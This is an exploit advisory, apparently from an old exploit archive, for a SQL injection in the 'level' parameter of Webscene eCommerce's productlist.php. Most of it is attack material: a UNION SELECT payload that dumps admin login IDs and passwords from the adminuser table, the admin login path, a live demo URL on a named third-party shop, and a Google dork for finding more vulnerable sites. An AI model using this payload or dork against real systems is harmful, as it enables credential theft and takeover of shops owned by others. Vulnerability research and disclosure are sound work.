Webscene eCommerce

############################################

Webscene eCommerce (level) Remote Sql Injection

vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm

#############################################

Bug Found By :Angela Chang (12-10-2008)
contact: angel@ch4ng.cc
#######################################

Greetz: nyubi & Vrs-Chk
especially thx to str0ke @ milw0rm.com

############################################

vuln file : productlist.php

Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

Demo Site : http://www.abcbeautyshop.co.uk/productlist.php?categoryid=20&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser--

Google dork : inurl:productlist.php?categoryid= level

#############################################
http://www.securityfocus.com/archive/1/497324/30/0/threaded


bug pertama ku , ehheeeheh pertama kali belajar sql ya dapatlha ini bug...